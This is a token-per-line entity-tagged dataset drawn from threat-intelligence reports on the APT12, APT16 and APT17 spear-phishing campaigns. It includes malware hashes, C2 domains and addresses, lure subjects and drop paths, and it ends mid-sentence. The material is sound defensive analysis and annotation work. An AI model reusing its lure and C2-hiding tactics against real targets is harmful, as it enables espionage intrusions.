APT12 S-APT
deliver O
these O
exploit O
documents O
via O
phishing E-ACT
emails S-TOOL
in O
multiple O
cases O
. O

Based O
on O
past O
APT12 S-APT
activity O
, O
we O
expect O
the O
threat O
group O
to O
continue O
to O
utilize O
phishing E-ACT
as O
a O
malware O
delivery O
method O
. O
0824.1.doc S-FILE
: O
f6fafb7c30b1114befc93f39d0698560 S-MD5
, O
CVE-2012-0158 S-VULID
. O

Jason_invitation.doc S-FILE
: O
00a95fb30be2d6271c491545f6c6a707 S-MD5
, O
CVE-2012-0158 S-VULID
. O

When O
the O
file O
is O
opened O
, O
it O
drops O
HIGHTIDE S-MAL
in O
the O
form O
of O
an O
executable O
file O
onto O
the O
infected O
system O
. O

RIPTIDE S-MAL
and O
HIGHTIDE S-MAL
differ O
on O
several O
points O
: O
executable O
file O
location O
, O
image O
base O
address O
, O
the O
User-Agent O
within O
the O
GET O
requests O
, O
and O
the O
format O
of O
the O
URI S-TOOL
. O

The O
RIPTIDE S-MAL
exploit O
document O
drops O
its O
executable O
file O
into O
the O
C:\Documents O
and O
Settings\{user}\Application O
Data\Location O
folder O
while O
the O
HIGHTIDE S-MAL
exploit O
document O
drops O
its O
executable O
file O
into O
the O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\ O
folder O
. O

All O
but O
one O
sample O
that O
we O
identified O
were O
written O
to O
this O
folder O
as O
word.exe S-FILE
. O

The O
one O
outlier O
was O
written O
as O
winword.exe S-FILE
. O

Research O
into O
this O
HIGHTIDE S-MAL
campaign O
revealed O
APT12 S-APT
targeted O
multiple O
Taiwanese B-IDTY
Government E-IDTY
organizations O
between O
August O
22 O
and O
28 O
. O

On O
Monday O
August O
25, O
2014 O
we O
observed O
a O
different O
spear B-ACT
phish E-ACT
email S-TOOL
sent O
from O
lilywang823@gmail.com S-EMAIL
to O
a O
technology O
company O
located O
in O
Taiwan S-LOC
. O

This O
spear B-ACT
phish E-ACT
contained O
a O
malicious O
Word S-TOOL
document O
that O
exploited O
CVE-2012-0158 S-VULID
. O

The O
MD5 S-ENCR
of O
the O
exploit O
document O
was O
e009b95ff7b69cbbebc538b2c5728b11 S-MD5
. O

Similar O
to O
the O
newly O
discovered O
HIGHTIDE S-MAL
samples O
documented O
above O
, O
this O
malicious O
document O
dropped O
a O
backdoor O
to O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\word.exe S-FILE
. O

THREEBYTE S-MAL
: O
16e627dbe730488b1c3d448bfc9096e2 S-MD5
. O

This O
backdoor O
sent O
the O
following O
callback O
traffic O
to O
video.csmcpr.com S-DOM
. O

The O
THREEBYTE S-MAL
spear B-ACT
phishing E-ACT
incident O
( O
while O
not O
yet O
attributed O
) O
shared O
the O
following O
characteristics O
with O
the O
above O
HIGHTIDE S-MAL
campaign O
attributed O
to O
APT12 S-APT
: O
The O
THREEBYTE B-MAL
backdoor E-MAL
was O
compiled O
two O
days O
after O
the O
HIGHTIDE B-MAL
backdoors E-MAL
; O

Both O
the O
THREEBYTE S-MAL
and O
HIGHTIDE B-MAL
backdoors E-MAL
were O
used O
in O
attacks O
targeting O
organizations O
in O
Taiwan S-LOC
; O

Both O
the O
THREEBYTE S-MAL
and O
HIGHTIDE B-MAL
backdoors E-MAL
were O
written O
to O
the O
same O
filepath O
of O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\word.exe S-FILE
; O

APT12 S-APT
has O
previously O
used O
the O
THREEBYTE B-MAL
backdoor E-MAL
. O

On O
August O
25, O
2014, O
we O
observed O
another O
round O
of O
spear B-ACT
phishing E-ACT
emails S-TOOL
targeting O
a O
high-technology O
company O
in O
Japan S-LOC
. O

Attached O
to O
this O
email S-TOOL
was O
another O
malicious O
document O
that O
was O
designed O
to O
exploit O
CVE-2012-0158 S-VULID
. O

This O
malicious O
Word O
document O
had O
an O
MD5 S-ENCR
of O
499bec15ac83f2c8998f03917b63652e S-MD5
and O
dropped O
a O
backdoor O
to O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\word.exe S-FILE
. O

The O
backdoor O
had O
the O
following O
properties O
: O

WATERSPOUT S-MAL
: O

f9cfda6062a8ac9e332186a7ec0e706a S-MD5
. O

The O
backdoor O
connects O
to O
a O
command O
and O
control O
server O
at O
icc.ignorelist.com S-DOM
. O

Similar O
to O
RIPTIDE S-MAL
and O
HIGHTIDE S-MAL
, O
the O
WATERSPOUT B-MAL
backdoor E-MAL
is O
an O
HTTP S-PROT
based O
backdoor O
that O
communicates O
with O
its O
C2 S-TOOL
server O
. O

Although O
there O
are O
no O
current O
infrastructure O
ties O
to O
link O
this O
backdoor O
to O
APT12 S-APT
, O
there O
are O
several O
data O
points O
that O
show O
a O
possible O
tie O
to O
the O
same O
actors O
: O

Same O
initial O
delivery O
method O
( O
spear B-ACT
phishing E-ACT
email S-TOOL
) O
with O
a O
Microsoft S-IDTY
Word S-TOOL
Document O
exploiting O
CVE-2012-0158 S-VULID
. O

The O
same O
“ O
Tran B-TOOL
Duy I-TOOL
Linh E-TOOL
” O
Microsoft S-IDTY
Word S-TOOL
Exploit O
Kit O
was O
used O
in O
delivery O
of O
this O
backdoor O
. O

Similar O
Targets O
were O
observed O
where O
the O
threat O
actors O
utilized O
this O
backdoor O
: O
Japanese B-IDTY
Tech I-IDTY
Company E-IDTY
, O
Taiwanese B-IDTY
Government E-IDTY
Organizations O
, O
Organizations O
in O
the O
Asia-Pacific B-LOC
Region E-LOC
that O
are O
of O
Interest O
to O
China S-LOC
. O

The O
WATERSPOUT B-MAL
backdoor E-MAL
was O
written O
to O
the O
same O
file O
path O
as O
the O
HIGHTIDE B-MAL
backdoors E-MAL
: O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\word.exe S-FILE
, O
C:\DOCUMENTS O
and O
SETTINGS\{user}\LOCAL O
SETTINGS\Temp\winword.exe S-FILE
. O

WATERSPOUT S-MAL
was O
compiled O
within O
two O
days O
of O
the O
last O
HIGHTIDE B-MAL
backdoor E-MAL
and O
on O
the O
same O
day O
as O
the O
THREEBYTE B-MAL
backdoor E-MAL
. O

APT12 S-APT
closely O
monitors O
online O
media O
related O
to O
its O
tools O
and O
operations O
and O
reacts O
when O
its O
tools O
are O
publicly O
disclosed O
. O

APT12 S-APT
has O
the O
ability O
to O
adapt O
quickly O
to O
public O
exposures O
with O
new O
tools O
, O
tactics O
, O
and O
procedures O
( O
TTPs O
) O
. O

Public O
disclosures O
may O
result O
in O
an O
immediate O
change O
in O
APT12 S-APT
’s O
tools O
. O

These O
changes O
may O
be O
temporary O
and O
FireEye S-SECTEAM
believes O
they O
are O
aimed O
at O
decreasing O
detection O
of O
their O
tools O
until O
a O
more O
permanent O
and O
effective O
TTP O
change O
can O
be O
implemented O
( O
e.g. O
, O
WATERSPOUT S-MAL
) O
. O

Although O
these O
points O
do O
not O
definitively O
tie O
WATERSPOUT S-MAL
to O
APT12 S-APT
, O
they O
do O
indicate O
a O
possible O
connection O
between O
the O
WATERSPOUT S-MAL
campaign O
, O
the O
THREEBYTE S-MAL
campaign O
, O
and O
the O
HIGHTIDE S-MAL
campaign O
attributed O
to O
APT12 S-APT
. O

FireEye S-SECTEAM
believes O
the O
change O
from O
RIPTIDE S-MAL
to O
HIGHTIDE S-MAL
represents O
a O
temporary O
tool O
shift O
to O
decrease O
malware O
detection O
while O
APT12 S-APT
developed O
a O
completely O
new O
malware O
toolset O
. O

These O
development O
efforts O
may O
have O
resulted O
in O
the O
emergence O
of O
the O
WATERSPOUT B-MAL
backdoor E-MAL
. O

Though O
public O
disclosures O
resulted O
in O
APT12 S-APT
adaptations O
, O
FireEye S-SECTEAM
observed O
only O
a O
brief O
pause O
in O
APT12 S-APT
activity O
before O
the O
threat O
actors O
returned O
to O
normal O
activity O
levels O
. O

Similarly O
, O
the O
public O
disclosure O
of O
APT12 S-APT
’s O
intrusion O
at O
the O
New B-IDTY
York I-IDTY
Times E-IDTY
also O
led O
to O
only O
a O
brief O
pause O
in O
the O
threat O
group O
’s O
activity O
and O
immediate O
changes O
in O
TTPs O
. O

The O
pause O
and O
retooling O
by O
APT12 S-APT
was O
covered O
in O
the O
Mandiant S-SECTEAM
2014 O
M-Trends S-SECTEAM
report O
. O

Currently O
, O
APT12 S-APT
continues O
to O
target O
organizations O
and O
conduct O
cyber O
operations O
using O
its O
new O
tools O
. O

Most O
recently O
, O
FireEye S-SECTEAM
observed O
HIGHTIDE S-MAL
at O
multiple O
Taiwan-based O
organizations O
and O
the O
suspected O
APT12 S-APT
WATERSPOUT B-MAL
backdoor E-MAL
at O
a O
Japan-based O
electronics O
company O
. O


APT12 S-APT
. O

The O
attackers O
behind O
the O
breach O
of O
the O
New B-IDTY
York I-IDTY
Times E-IDTY
’ O
computer O
network O
late O
last O
year O
appear O
to O
be O
mounting O
fresh O
assaults O
that O
leverage O
new O
and O
improved O
versions O
of O
malware O
. O

The O
new O
campaigns O
mark O
the O
first O
significant O
stirrings O
from O
the O
group O
since O
it O
went O
silent O
in O
January O
in O
the O
wake O
of O
a O
detailed O
expose O
of O
the O
group O
and O
its O
exploits O
— O
and O
a O
retooling O
of O
what O
security O
researchers O
believe O
is O
a O
massive O
spying O
operation O
based O
in O
China S-LOC
. O

The O
newest O
campaign O
uses O
updated O
versions O
of O
Aumlib S-MAL
and O
Ixeshe S-MAL
. O

Aumlib S-MAL
, O
which O
for O
years O
has O
been O
used O
in O
targeted O
attacks O
, O
now O
encodes O
certain O
HTTP S-PROT
communications O
. O

FireEye S-SECTEAM
researchers O
spotted O
the O
malware O
when O
analyzing O
a O
recent O
attempted O
attack O
on O
an O
organization O
involved O
in O
shaping O
economic O
policy O
. O

And O
a O
new O
version O
of O
Ixeshe S-MAL
, O
which O
has O
been O
in O
service O
since O
2009 O
to O
attack O
targets O
in O
East B-LOC
Asia E-LOC
, O
uses O
new O
network O
traffic O
patterns O
, O
possibly O
to O
evade O
traditional O
network O
security O
systems O
. O

The O
updates O
are O
significant O
for O
both O
of O
the O
longstanding O
malware O
families O
; O
before O
this O
year O
, O
Aumlib S-MAL
had O
not O
changed O
since O
at O
least O
May O
2011, O
and O
Ixeshe O
had O
not O
evolved O
since O
at O
least O
December O
2011 O
. O

Cybercriminals O
are O
constantly O
evolving O
and O
adapting O
in O
their O
attempts O
to O
bypass O
computer O
network O
defenses O
. O

But O
, O
larger O
, O
more O
successful O
threat O
actors O
tend O
to O
evolve O
at O
a O
slower O
rate O
. O

As O
long O
as O
these O
actors O
regularly O
achieve O
their O
objective O
( O
stealing O
sensitive O
data O
) O
, O
they O
are O
not O
motivated O
to O
update O
or O
rethink O
their O
techniques O
, O
tactics O
, O
or O
procedures O
( O
TTPs O
) O
. O

These O
threat O
actors O
’ O
tactics O
follow O
the O
same O
principles O
of O
evolution O
– O
successful O
techniques O
propagate O
, O
and O
unsuccessful O
ones O
are O
abandoned O
. O

Attackers O
do O
not O
change O
their O
approach O
unless O
an O
external O
force O
or O
environmental O
shift O
compels O
them O
to O
. O

As O
the O
old O
saying O
goes O
: O
If O
it O
ain’t O
broke O
, O
don’t O
fix O
it O
. O

So O
when O
a O
larger O
, O
successful O
threat O
actor O
changes O
up O
tactics O
, O
the O
move O
always O
piques O
our O
attention O
. O

Naturally O
, O
our O
first O
priority O
is O
ensuring O
that O
we O
detect O
the O
new O
or O
altered O
TTPs O
. O

But O
we O
also O
attempt O
to O
figure O
out O
why O
the O
adversary O
changed O
— O
what O
broke? O
— O
so O
that O
we O
can O
predict O
if O
and O
when O
they O
will O
change O
again O
in O
the O
future O
. O

We O
observed O
an O
example O
of O
this O
phenomenon O
around O
May O
. O

About O
four O
months O
after O
The O
New B-IDTY
York I-IDTY
Times E-IDTY
publicized O
an O
attack O
on O
its O
network O
, O
the O
attackers O
behind O
the O
intrusion O
deployed O
updated O
versions O
of O
their O
Backdoor.APT.Aumlib S-FILE
and O
Backdoor.APT.Ixeshe S-FILE
malware O
families O
. O

The O
previous O
versions O
of O
Aumlib S-MAL
had O
not O
changed O
since O
at O
least O
May O
2011, O
and O
Ixeshe O
had O
not O
evolved O
since O
at O
least O
December O
2011 O
. O

We O
cannot O
say O
for O
sure O
whether O
the O
attackers O
were O
responding O
to O
the O
scrutiny O
they O
received O
in O
the O
wake O
of O
the O
episode O
. O

But O
we O
do O
know O
the O
change O
was O
sudden O
. O

Akin O
to O
turning O
a O
battleship O
, O
retooling O
TTPs O
of O
large O
threat O
actors O
is O
formidable O
. O

Such O
a O
move O
requires O
recoding O
malware O
, O
updating O
infrastructure O
, O
and O
possibly O
retraining O
workers O
on O
new O
processes O
. O

The O
following O
sections O
detail O
the O
changes O
to O
Backdoor.APT.Aumlib S-FILE
and O
Backdoor.APT.Ixeshe S-FILE
. O

Backdoor.APT.Aumlib S-FILE
: O

A O
recently O
observed O
malware O
sample O
( O
hash O
value O
832f5e01be536da71d5b3f7e41938cfb S-MD5
) O
appears O
to O
be O
a O
modified O
variant O
of O
Aumlib S-MAL
. O

The O
sample O
, O
which O
was O
deployed O
against O
an O
organization O
involved O
in O
shaping O
economic O
policy O
, O
was O
downloaded O
from O
the O
following O
URL O
: O

status.acmetoy.com S-URL
/DD/ O
myScript.js S-FILE
or O
status.acmetoy.com S-URL
/DD/ O
css.css S-FILE
. O

This O
output O
reveals O
the O
following O
changes O
when O
compared O
with O
earlier O
variants O
: O

The O
POST O
URI O
is O
changed O
to O
/bbs/ O
search.asp S-FILE
( O
as O
mentioned O
, O
earlier O
Aumlib S-MAL
variants O
used O
a O
POST O
URI O
of O
/bbs/ O
info.asp S-FILE
. O
) O
The O
POST O
body O
is O
now O
encoded O
. O

These O
subtle O
changes O
may O
be O
enough O
to O
circumvent O
existing O
IDS O
signatures O
designed O
to O
detect O
older O
variants O
of O
the O
Aumlib S-MAL
family O
. O

The O
sample O
832f5e01be536da71d5b3f7e41938cfb S-MD5
shares O
code O
with O
an O
older O
Aumlib S-MAL
variant O
with O
the O
hash O
cb3dcde34fd9ff0e19381d99b02f9692 S-MD5
. O

The O
sample O
cb3dcde34fd9ff0e19381d99b02f9692 S-MD5
connected O
to O
documents.myPicture.info S-URL
and O
www.documents.myPicture.info S-URL
and O
as O
expected O
generated O
the O
a O
POST O
request O
to O
/bbs/ O
info.asp S-FILE
. O

Backdoor.APT.Ixeshe S-FILE
: O

Ixeshe S-MAL
has O
been O
used O
in O
targeted O
attacks O
since O
2009, O
often O
against O
entities O
in O
East B-LOC
Asia E-LOC
. O

The O
network O
traffic O
is O
encoded O
with O
a O
custom O
Base64 S-ENCR
alphabet O
. O

We O
analyzed O
a O
recent O
sample O
that O
appears O
to O
have O
targeted O
entities O
in O
Taiwan S-LOC
, O
a O
target O
consistent O
with O
previous O
Ixeshe S-MAL
activity O
. O

This O
sample O
( O
aa873ed803ca800ce92a39d9a683c644 S-MD5
) O
exhibited O
network O
traffic O
that O
does O
not O
match O
the O
earlier O
pattern O
and O
therefore O
may O
evade O
existing O
network O
traffic O
signatures O
designed O
to O
detect O
Ixeshe S-MAL
related O
infections O
. O


APT16 S-APT
. O

Between O
November O
26, O
2015, O
and O
December O
1, O
2015, O
known O
and O
suspected O
China S-LOC
based O
APT O
groups O
launched O
several O
spear B-ACT
phishing E-ACT
attacks O
targeting O
Japanese O
and O
Taiwanese O
organizations O
in O
the O
high-tech O
, O
government O
services O
, O
media O
and O
financial O
services O
industries O
. O

Each O
campaign O
delivered O
a O
malicious O
Microsoft S-IDTY
Word S-TOOL
document O
exploiting O
the O
aforementioned O
EPS S-TOOL
dict O
copy O
use-after-free O
vulnerability O
, O
and O
the O
local O
Windows S-OS
privilege O
escalation O
vulnerability O
CVE-2015-1701 S-VULID
. O

The O
successful O
exploitation O
of O
both O
vulnerabilities O
led O
to O
the O
delivery O
of O
either O
a O
downloader O
that O
we O
refer O
to O
as O
IRONHALO S-MAL
, O
or O
a O
backdoor O
that O
we O
refer O
to O
as O
ELMER S-MAL
. O

On O
November O
26, O
2015, O
a O
suspected O
China S-LOC
based O
APT O
group O
sent O
Japanese O
defense O
policy-themed O
spear B-ACT
phishing E-ACT
emails S-TOOL
to O
multiple O
Japanese O
financial O
and O
high-tech O
companies O
. O

As O
shown O
in O
Figure O
1, O
the O
emails S-TOOL
originated O
from O
the O
Yahoo S-IDTY
! O
email S-TOOL
address O
mts03282000@yahoo.co.jp S-EMAIL
, O
and O
contained O
the O
subject O
“ O
Sending O
of O
New O
Year O
No
. O

Foreword O
” O
. O

Each O
phishing E-ACT
message O
contained O
the O
same O
malicious O
Microsoft S-IDTY
Word S-TOOL
attachment O
. O

The O
malicious O
attachment O
resembled O
an O
article O
hosted O
on O
a O
legitimate O
Japanese O
defense-related O
website O
, O
as O
both O
discussed O
national O
defense O
topics O
and O
carried O
the O
same O
byline O
. O

The O
lure O
documents O
also O
used O
the O
Japanese O
calendar O
, O
as O
indicated O
by O
the O
27th O
year O
in O
the O
Heisei O
period O
. O

This O
demonstrates O
that O
the O
threat O
actors O
understand O
conventional O
Japanese O
date O
notation O
. O

Following O
the O
exploitation O
of O
the O
EPS S-TOOL
and O
CVE-2015-1701 S-VULID
vulnerabilities O
, O
the O
exploit O
payload O
drops O
either O
a O
32-bit O
or O
64-bit O
binary O
containing O
an O
embedded O
IRONHALO S-MAL
malware O
sample O
. O

IRONHALO S-MAL
is O
a O
downloader O
that O
uses O
the O
HTTP S-PROT
protocol O
to O
retrieve O
a O
Base64 S-ENCR
encoded O
payload O
from O
a O
hard-coded O
command-and-control S-TOOL
( O
C2 S-TOOL
) O
server O
and O
uniform O
resource O
locator O
( O
URL O
) O
path O
. O

The O
encoded O
payload O
is O
written O
to O
a O
temporary O
file O
, O
decoded O
and O
executed O
in O
a O
hidden O
window O
. O

The O
encoded O
and O
decoded O
payloads O
are O
written O
to O
files O
named O
igfxHK[%rand%].dat S-FILE
and O
igfxHK[%rand%].exe S-FILE
respectively O
, O
where O
[%rand%] O
is O
a O
4-byte O
hexadecimal O
number O
based O
on O
the O
current O
timestamp O
. O

IRONHALO S-MAL
: O
AcroRd32Info.exe.exe S-FILE
a8ccb2fc5fec1b89f778d93096f8dd65 S-MD5
. O

IRONHALO S-MAL
persists O
by O
copying O
itself O
to O
the O
current O
user O
’s O
Startup S-TOOL
folder O
. O

This O
variant O
sends O
an O
HTTP S-PROT
request O
to O
a O
legitimate O
Japanese O
website O
using O
a O
malformed O
User-Agent S-TOOL
string O
, O
as O
shown O
in O
Figure O
2 O
. O

The O
threat O
actors O
likely O
compromised O
the O
legitimate O
site O
and O
attempted O
to O
use O
it O
as O
a O
staging O
server O
for O
second-stage O
payloads O
. O

On O
December O
1, O
2015, O
threat O
actors O
launched O
two O
additional O
spear B-ACT
phishing E-ACT
attacks O
exploiting O
the O
undisclosed O
EPS S-TOOL
vulnerability O
and O
CVE-2015-1701 S-VULID
. O

Unlike O
the O
Nov. O
26 O
campaign O
, O
these O
attacks O
targeted O
Taiwanese O
governmental O
and O
media O
and O
entertainment O
organizations O
. O

Moreover O
, O
the O
exploit O
dropped O
a O
different O
malware O
payload O
, O
a O
backdoor O
we O
refer O
to O
as O
ELMER S-MAL
. O

The O
first O
spear B-ACT
phishing E-ACT
message O
was O
sent O
to O
a O
Taiwanese O
governmental O
employee O
on O
Dec. O
1 O
. O

The O
attachment O
was O
created O
using O
the O
traditional O
Chinese O
character O
set O
, O
and O
contained O
a O
flowchart O
that O
appeared O
to O
be O
taken O
from O
the O
legitimate O
Taiwanese B-IDTY
government E-IDTY
auction O
website O
http://shwoo.gov.taipei/buyer_flowchart.asp S-URL
. O

The O
second O
December O
spear B-ACT
phishing E-ACT
attack O
targeted O
Taiwan S-LOC
based O
news O
media O
organizations O
. O

The O
emails S-TOOL
originated O
from O
the O
address O
dpptccb.dpp@msa.hinet.net S-EMAIL
, O
and O
contained O
the O
subject O
DPP's O
Contact O
Information O
Update O
. O

Based O
on O
the O
email S-TOOL
address O
naming O
convention O
and O
message O
subject O
, O
the O
threat O
actors O
may O
have O
tried O
to O
make O
the O
message O
appear O
to O
be O
a O
legitimate O
communication O
from O
the O
Democratic O
Progressive O
Party O
( O
DPP O
) O
, O
Taiwan S-LOC
’s O
opposition O
party O
. O

Unlike O
the O
previous O
exploit O
documents O
, O
this O
malicious O
attachment O
did O
not O
contain O
any O
visible O
text O
when O
opened O
in O
Microsoft S-IDTY
Word S-TOOL
. O

The O
exploit O
documents O
delivered O
during O
the O
December O
campaigns O
dropped O
a O
binary O
containing O
an O
embedded O
variant O
of O
a O
backdoor O
we O
refer O
to O
as O
ELMER S-MAL
. O

ELMER S-MAL
is O
a O
non-persistent O
proxy-aware O
HTTP S-PROT
backdoor O
written O
in O
Delphi S-TOOL
, O
and O
is O
capable O
of O
performing O
file O
uploads O
and O
downloads O
, O
file O
execution O
, O
and O
process O
and O
directory O
listings O
. O

To O
retrieve O
commands O
, O
ELMER S-MAL
sends O
HTTP S-PROT
GET O
requests O
to O
a O
hard-coded O
C2 S-TOOL
server O
, O
and O
parses O
the O
HTTP S-PROT
response O
packets O
received O
from O
the O
C2 S-TOOL
server O
for O
an O
integer O
string O
corresponding O
to O
the O
command O
that O
needs O
to O
be O
executed O
. O

Table O
2 O
lists O
the O
ELMER B-MAL
backdoors E-MAL
observed O
during O
the O
December O
campaigns O
. O

The O
ELMER S-MAL
variant O
6c33223db475f072119fe51a2437a542 S-MD5
beaconed O
to O
the O
C2 S-TOOL
IP O
address O
121.127.249.74 S-IP
over O
port O
443 O
. O


APT16 S-APT
. O

While O
attribution O
of O
the O
first O
two O
spear B-ACT
phishing E-ACT
attacks O
is O
still O
uncertain O
, O
we O
attribute O
the O
second O
December O
phishing E-ACT
campaign O
to O
the O
China S-LOC
based O
APT O
group O
that O
we O
refer O
to O
as O
APT16 S-APT
. O

This O
is O
based O
on O
the O
use O
of O
the O
known O
APT16 S-APT
domain O
rinpocheinfo.com S-DOM
, O
as O
well O
as O
overlaps O
in O
previously O
observed O
targeting O
and O
tactics O
, O
techniques O
and O
procedures O
( O
TTPs O
) O
. O

Taiwanese O
citizens O
will O
go O
to O
the O
polls O
on O
January O
16 O
, O
2016 O
, O
to O
choose O
a O
new O
President O
and O
legislators O
. O

According O
to O
recent O
opinion O
polls O
, O
the O
Democratic B-IDTY
Progressive I-IDTY
Party E-IDTY
( O
DPP S-IDTY
) O
candidate O
Tsai O
Ing-wen O
is O
leading O
her O
opponents O
and O
is O
widely O
expected O
to O
win O
the O
election O
. O

The O
DPP O
is O
part O
of O
the O
pan-green O
coalition O
that O
favors O
Taiwanese O
independence O
over O
reunification O
with O
the O
mainland O
, O
and O
the O
party O
’s O
victory O
would O
represent O
a O
shift O
away O
from O
the O
ruling O
Kuomintang O
’s O
closer O
ties O
with O
the O
PRC S-IDTY
. O

Since O
1949 O
, O
Beijing S-LOC
has O
claimed O
Taiwan S-LOC
as O
a O
part O
of O
China S-LOC
and O
strongly O
opposes O
any O
action O
toward O
independence O
. O

The O
Chinese B-IDTY
government E-IDTY
is O
therefore O
concerned O
whether O
a O
DPP S-IDTY
victory O
might O
weaken O
the O
commercial O
and O
tourism O
ties O
between O
China S-LOC
and O
Taiwan S-LOC
, O
or O
even O
drive O
Taiwan S-LOC
closer O
to O
independence O
. O

In O
2005 O
, O
the O
Chinese B-IDTY
government E-IDTY
passed O
an O
“ O
anti-secession O
” O
law O
that O
signified O
its O
intention O
to O
use O
“ O
non-peaceful O
” O
means O
to O
stymie O
any O
Taiwanese O
attempt O
to O
secede O
from O
China S-LOC
. O

APT16 S-APT
actors O
sent O
spear B-ACT
phishing E-ACT
emails S-TOOL
to O
two O
Taiwanese O
media O
organization O
addresses O
and O
three O
webmail O
addresses O
. O

The O
message O
subject O
read O
“ O
DPP S-IDTY
’s O
Contact O
Information O
Update O
” O
, O
apparently O
targeting O
those O
interested O
in O
contact O
information O
for O
DPP S-IDTY
members O
or O
politicians O
. O

The O
Chinese B-IDTY
government E-IDTY
would O
benefit O
from O
improved O
insight O
into O
local O
media O
coverage O
of O
Taiwanese O
politics O
, O
both O
to O
better O
anticipate O
the O
election O
outcome O
and O
to O
gather O
additional O
intelligence O
on O
politicians O
, O
activists O
, O
and O
others O
who O
interact O
with O
journalists O
. O

This O
tactic O
is O
not O
without O
precedent O
; O
in O
2013 O
, O
the O
New B-IDTY
York I-IDTY
Times E-IDTY
revealed O
it O
had O
been O
the O
target O
of O
China S-LOC
based O
actors O
shortly O
after O
it O
reported O
on O
the O
alleged O
mass O
accumulation O
of O
wealth O
by O
then-Prime O
Minister O
Wen O
Jiabao O
and O
his O
family O
. O

The O
actors O
likely O
sought O
information O
on O
the O
newspaper O
’s O
sources O
in O
China S-LOC
, O
who O
could O
be O
silenced O
by O
the O
government O
. O

Compromising O
these O
Taiwanese O
news O
organizations O
would O
also O
allow O
the O
actors O
to O
gain O
access O
to O
informants O
or O
other O
protected O
sources O
, O
who O
might O
then O
be O
targeted O
for O
further O
intelligence O
collection O
or O
even O
retribution O
. O

The O
webmail O
addresses O
, O
while O
unknown O
, O
were O
possibly O
the O
personal-use O
addresses O
of O
the O
individuals O
whose O
corporate O
domain O
emails S-TOOL
were O
targeted O
. O

As O
corporate O
networks O
become O
more O
secure O
and O
users O
become O
more O
vigilant O
, O
personal O
accounts O
can O
still O
offer O
a O
means O
to O
bypass O
security O
systems O
. O

This O
tactic O
exploits O
users O
’ O
reduced O
vigilance O
when O
reading O
their O
own O
personal O
email S-TOOL
, O
even O
when O
using O
corporate O
IT O
equipment O
to O
do O
so O
. O

On O
the O
same O
date O
that O
APT16 S-APT
targeted O
Taiwanese O
media O
, O
suspected O
Chinese O
APT O
actors O
also O
targeted O
a O
Taiwanese B-IDTY
government E-IDTY
agency O
, O
sending O
a O
lure O
document O
that O
contained O
instructions O
for O
registration O
and O
subsequent O
listing O
of O
goods O
on O
a O
local O
Taiwanese O
auction O
website O
. O

It O
is O
possible O
, O
although O
not O
confirmed O
, O
that O
APT16 S-APT
was O
also O
responsible O
for O
targeting O
this O
government O
agency O
, O
given O
both O
the O
timeframe O
and O
the O
use O
of O
the O
same O
n-day O
to O
eventually O
deploy O
the O
ELMER B-MAL
backdoor E-MAL
. O

One O
of O
the O
media O
organizations O
involved O
in O
this O
latest O
activity O
was O
targeted O
in O
June O
2015 O
, O
while O
its O
Hong O
Kong O
branch O
was O
similarly O
targeted O
in O
August O
2015 O
. O

APT16 S-APT
actors O
were O
likely O
also O
responsible O
for O
the O
June O
2015 O
activity O
. O

They O
sent O
spear B-ACT
phishing E-ACT
messages O
with O
the O
subject O
“ O
2015 O
Taiwan S-LOC
Security O
and O
Cultural O
Forum O
Invitation O
Form O
” O
, O
and O
used O
a O
different O
tool O
– O
a O
tool O
that O
we O
refer O
to O
as O
DOORJAMB S-MAL
– O
in O
their O
attempt O
to O
compromise O
the O
organization O
. O

A O
different O
group O
, O
known O
as O
admin@338 S-EMAIL
, O
used O
LOWBALL S-MAL
malware O
during O
its O
Hong B-LOC
Kong E-LOC
activity O
. O

Despite O
the O
differing O
sponsorship O
, O
penetration O
of O
Hong B-LOC
Kong E-LOC
and O
Taiwan S-LOC
based O
media O
organizations O
continues O
to O
be O
a O
priority O
for O
China S-LOC
based O
threat O
groups O
. O

The O
difference O
in O
sponsorship O
could O
be O
the O
result O
of O
tasking O
systems O
that O
allocate O
targeting O
responsibility O
to O
different O
groups O
based O
on O
their O
targets O
’ O
geographic O
location O
. O

In O
other O
words O
, O
while O
media O
organizations O
are O
important O
targets O
, O
it O
is O
possible O
that O
two O
separate O
groups O
are O
responsible O
for O
Hong B-LOC
Kong E-LOC
and O
Taiwan S-LOC
, O
respectively O
. O

The O
suspected O
APT16 S-APT
targeting O
of O
the O
Taiwanese B-IDTY
government E-IDTY
agency O
– O
in O
addition O
to O
the O
Taiwanese O
media O
organizations O
– O
further O
supports O
this O
possibility O
. O

IRONHALO S-MAL
: O
CVE-2015-1701 S-VULID
. O

ELMER S-MAL
: O
CVE-2015-1701 S-VULID
. O

These O
clusters O
of O
activity O
raise O
interesting O
questions O
about O
the O
use O
of O
an O
identical O
silently-patched O
vulnerability O
, O
possibly O
by O
multiple O
threat O
groups O
. O

Both O
Japan S-LOC
and O
Taiwan S-LOC
are O
important O
intelligence O
collection O
targets O
for O
China S-LOC
, O
particularly O
because O
of O
recent O
changes O
to O
Japan S-LOC
’s O
pacifist O
constitution O
and O
the O
upcoming O
Taiwanese O
election O
. O

Based O
on O
our O
visibility O
and O
available O
data O
, O
we O
only O
attribute O
one O
campaign O
to O
the O
Chinese O
APT O
group O
APT16 S-APT
. O


APT17 S-APT
. O

FireEye S-SECTEAM
Threat O
Intelligence O
and O
the O
Microsoft S-IDTY
Threat O
Intelligence O
Center O
investigated O
a O
command-and-control S-TOOL
( O
C2 S-TOOL
) O
obfuscation O
tactic O
used O
on O
Microsoft S-IDTY
’s O
TechNet S-TOOL
, O
a O
web O
portal O
for O
IT O
professionals O
. O

TechNet S-TOOL
’s O
security O
was O
in O
no O
way O
compromised O
by O
this O
tactic O
, O
which O
is O
likely O
possible O
on O
other O
message O
boards O
and O
forums O
. O

FireEye S-SECTEAM
Threat O
Intelligence O
assesses O
that O
APT17 S-APT
, O
a O
China S-LOC
based O
threat O
group O
, O
was O
behind O
the O
attempt O
. O

Other O
groups O
have O
used O
legitimate O
websites O
to O
host O
C2 S-TOOL
IP O
address O
in O
the O
past O
. O

APT17 S-APT
was O
embedding O
the O
encoded O
C2 S-TOOL
IP O
address O
for O
the O
BLACKCOFFEE S-MAL
malware O
in O
legitimate O
Microsoft S-IDTY
TechNet S-TOOL
profiles O
pages O
and O
forum O
threads O
, O
a O
method O
